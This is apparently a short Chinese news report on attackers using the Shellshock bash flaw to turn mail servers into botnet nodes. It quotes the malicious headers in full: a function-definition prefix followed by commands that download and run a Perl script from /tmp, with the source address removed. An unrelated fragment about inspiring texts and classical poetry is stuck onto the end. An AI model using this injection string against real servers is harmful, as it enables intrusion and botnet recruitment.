攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。
安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:
Shellshock spam October 2014 (IP地址已隐藏)===To:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendReferences:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendCc:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendFrom:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendSubject:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendDate:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendMessage-ID:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendComments:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendKeywords:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendResent-Date:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendResent-From:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legendResent-Sender:() { :; };wget -O /tmp/.legend ;killall -9 perl;perl /tmp/.legend
,教育人的,激励人的,安慰人不开心的. 或者是 诗词 诗经里的..
